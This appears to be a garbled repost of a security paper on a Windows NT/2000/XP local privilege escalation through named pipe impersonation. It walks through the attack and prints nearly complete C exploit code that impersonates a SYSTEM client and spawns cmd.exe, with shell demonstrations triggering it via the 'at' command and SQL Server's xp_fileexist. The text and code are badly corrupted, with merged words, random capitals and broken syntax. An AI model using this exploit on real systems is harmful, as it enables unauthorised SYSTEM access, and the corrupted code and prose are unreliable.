All latest versions of Microsoft Windows family operation systems arebased on Windows NT kernel. This fact has positive impact for both remoteand local security of Windows world. There are still some thin placesthough allowing obtaining Local System privileges on the local computerleading to the full system compromise. Usually this is becausedifferent buffer overruns in stack or heap in system services, like incase of any operation system. However we should not forget about systemspecific bugs because of abnormal behavior of system functions. This kindof bugs is very system dependant and from time to time is Discoveredin Different Os. of Cause, Windows Is Not Exception.
Specific bugs are usually having impact on local users. Of cause, this isnot a kind of axiom, but local user has access to larger amount ofthe system API functions comparing with remote one. So, we are talkingabout possibility for local user to escalate his privileges . '
According to MSDN to launch application with different account one mustuse LogonUser () and CreateProcessAsUser () functions. LogonUser () requiresusername and password for account we need. 'LogonUser ()' task is to setSE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME privileges for access token. This privileges are required for CreateProcessAsUser (). Onlysystem processes have these privileges. Actually 'Administrator' accounthave no enough right for CreateProcessAsUser (). So, to execute someapplication, eg 'cmd.exe' with LocalSystem account we must have italready. Since we do not have username and password of privileged user weneed another solution.In this paper we will obtain 'LocalSystem' privileges with file accessAPI To open file Windows application call CreateFile () function, definedbelow.:
HANDLE CreateFile (LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
To Open File We Must Call Something Like
Handle Hfile; Hfile = Createfile (szfilename, generic_read, file_share_read, null, open_existing, file_attribute_normal, null);
For advanced Windows programmer it's clear that this function has moreapplication rather than only opening ordinary files. It's used toopenor create new files, directories, physical drives, and differentresources for interprocess communication, such as pipes and mailslots.We will be concerned with pipes.Pipes Are Used for One-Way Data Exchange Between Parent and child Processes. All Read / Write Operations Are Close Tothesame File Operations.
Named Pipes Are Used for Two-Way Data Exchange Between Client And Serveror Between Two Client Processes. Like Pipes They Are Like Files, But Canbe Used to Exchange Data on The Network.
Named Pipe Creation Example Shown Below:
HPIPE = CREATENAMEDPIPE (Szpipe, PIPE_ACCESS_DUPEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, NULL); | = ------------------------------------------------------------------------------------------------------------------ -------------------------------------------------- = | Named Pipe's name can vary, but it always has predefined format. The example of valid name is' //./pipe/getsys'. For windows, '//./'sequence always precedes filename, EG IF "C: /BOOT.INI "Is Requestedsystem Actually Accesses '//./c:/boot.ini'. This Format Is Compatiblewith UNC Standard.
With basic knowledge of named pipes operations we can suppose there can bea way to full application to access named pipe instead of user suppliedfile. For example, if we created named pipe "//./pipe/GetSys" we can tryto force application to access "// computername / pipe / getsys". It Gives US ACHANCE To Manipulate with access token.
Impersonation token is access token with client's privileges. That is, this is possibility for server to do something on client's behalf. In ourcase server is named pipe we created. And it becomes possible because weare granted SecurityImpersonation privilege for client. More precisely, wecan get . this privilege If client application has privileges of localsystem we can get access to registry, process and memory management andanother possibilities not available to ordinary user.This attack can be easily realized in practice Attack scenario for thisvulnerability is next.:
CREATE NAME PIPE
Wait Client Connect After Named Pipe Is Created.
2. Impersonate Client
Because We Assuts WE WILL HAVE Them TOO.
3. Obtain Required Rights. In Fact, We next ONLY
- se_assignprimarytoken_name - se_increase_quota_name
- token_all_access - token_dulicate
This is all we need for createprocessasuser () Function. To Obtain Rightswe Need New token with token_all_access privelege. And we can do it, Because We Have Privileges of Client Process.
Execute Code of Our Choice
IT Could Be Registry Access, Setting Some Hooks or Random Commands WITHSYSTEM Privileges. Last One is Most Interesting, Because We CAN Executestandalone Application Our Choice for Our Specific Needs.
AS IT WAS SAID BEFORE, NOW I CAN EXECUTE CREATEPROCESSASUSER () with system privilegegs. I Back to Beginning, But this Time I have all requiredprivileges and 'localsystem' is under my thumb.
................. ..
#include
IF (argc! = 2) {fprintf (stderr, "usage:% s
Memset (& Si, 0, SIZEOF (Si)); sprintf (szpipe, ".//pipe//getsys");
// Create named pipe "//./ pipe / getsys"
HANDLE hPipe = 0; hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, NULL); if (hPipe == INVALID_HANDLE_VALUE) {printf ( "Failed to create named pipe: / n% s / n ", szpipe); return 2;}
Printf ("create named pipe: .//pipe//getsys/n");
// initialize security descriptor to obtain client application // privileges pSD = (PSECURITY_DESCRIPTOR) LocalAlloc (LPTR, SECURITY_DESCRIPTOR_MIN_LENGTH); InitializeSecurityDescriptor (pSD, SECURITY_DESCRIPTOR_REVISION); SetSecurityDescriptorDacl (pSD, TRUE, pACL, FALSE); sa.nLength = sizeof (SECURITY_ATTRIBUTES) ; Sa.lpsecurityDescriptor = psd; sa.binherithandle = false;
Printf ("Waiting for Connection ... / N");
// Wait For Client ConnectNAMedPipe (HPIPE, NULL);
Printf ("Impersonate ... / N");
// Impersonate Client
If (! impersonatenamedpipeclient (hpipe)) {Printf ("Failed to Impersonate the named pipe./N"); CloseHandle (HPIPE); Return 3;} Printf ("Open Thread Token ... / N");
// Obtain Maximum Rights with token_all_Access
IF (! OpenThread (), token_all_access, true, & htokeen) {
IF (htoken! = invalid_handle_value) {Printf ("getLastError:% U / N", DW); CloseHandle (HTOKEN); RETURN 4;}} Printf ("Duplicating token ... / n");
// Obtain token_dublicate Privilege IF (DuplicateTokenEx (HToken, Maximum_Allowed, & Sa, SecurityimPersonation, TokenPrimary, & HToken2) == 0) {
Printf ("Error In Duplicate Token / N); Printf (" GetLastError:% U / N ", DW); Return 5;}
// fill pGeneric structure pGeneric = new GENERIC_MAPPING; pGeneric-> GenericRead = FILE_GENERIC_READ; pGeneric-> GenericWrite = FILE_GENERIC_WRITE; pGeneric-> GenericExecute = FILE_GENERIC_EXECUTE; pGeneric-> GenericAll = FILE_ALL_ACCESS;
MapGenericmask (& dwaccessdesired, pgener);
Dwsize = 256; char szuser [256]; getUsername (Szuser, & dwsize);
printf ( "Impersonating:% s / n", szUser); ZeroMemory (& si, sizeof (STARTUPINFO)); si.cb = sizeof (si); si.lpDesktop = NULL; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOW ;
Printf ("Creating New Process% S / N", Argv [1]);
// create new process as user if (! CreateProcessAsUser (hToken2, NULL, argv [1], & sa, & sa, true, NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE, NULL, NULL, & si, & pi)) {printf ( "GetLastError:% d / n ", GetLastError ());} // Wait Process to Complete and Exit WaitforsingleObject (Pi.hprocess, Infinite); CloseHandle (HPIPE); Return 0;}
. This vulnerability gives a chance for us to obtain system privileges onlocal computer The only condition is system process must access thischannel This condition is easy to reproduce with system services.For example.:
[shell 1]
> PIPE cmd.execreated named pipe: //./pipe/getsyswaiting for connection ...
[shell 2]
> TIME / T18: 15
> AT 18:16 / Interactive // computername / Pipe / getsys
New Task Added with code 1
[shell 1] impersonate ... Open thread token ... duplicating token ... impersonating: systemcreating new process cmd.exe
Now we have new instance of cmd.exe with system privileges. It means usercan easily obtain privileges of local system. Of cause reproduce thissituation is easy only in case, there is a service, which can access fileson user request. Because 'at' command Requires at Least Power UserPrivileges And May Be Used To Launch Cmd.exe Directly, WITHOUT Any Namedpipe this Example IS Useless.
In practice, this vulnerability may be exploited for privilege escalationby the local user if Microsoft SQL Server is installed. SQL server runswith system privileges and may be accessed with unprivileged user. @Stakereported vulnerability in xp_fileexist command. This command checks forfile existence and we can use It to access our named pipe. Attack Scenariois Nearly Same:
[shell 1]
> PIPE cmd.execreated named pipe: //pipe/getsyswaiting for connection ... [shell 2]
C: /> isql -u userpassword: 1> xp_fileexist '// computername / pipe / getsys'2> Go file exists is a directory parent directory exists ---------------------------------------------------------------------------------------------------------- ----------------------------------- 1 0 1
[shell 1]
Impersonate ... Open thread token ... duplicating token ... impersonating: systemcreating new process cmd.exe
At the end, it's good to point this Vulnerability EXISTS Inwindows NT / 2000 / XP and IS Patched with Windows 2000 SP4 Andon Windows 2003.
A big Than Zaraza (www.security.nnov.ru), Withnout Him, Nothing Could Bepossible.
[1] Overview of the "impersonate aclient after authentication" http://support.microsoft.com/default.aspx?scid=kb; [LN ];821546
[2] Exploit by Maceohttp://www.securityfocus.com/archive/1/74523
[3] Exploit by WirepairHttp://www.securityfocus.com/archive/1/329197
[4] Named Pipe Filename Local Prival Escalationwww.atstake.com/research/advisories/2003/a070803-1.txt
[5] Service Pack 4 for Windows 2000 http://download.microsoft.com/download/b/1/a/b1a2a4df-cc8e-454b-ad9f-378143d77aeb/sp4EXPRESS_EN.EXE
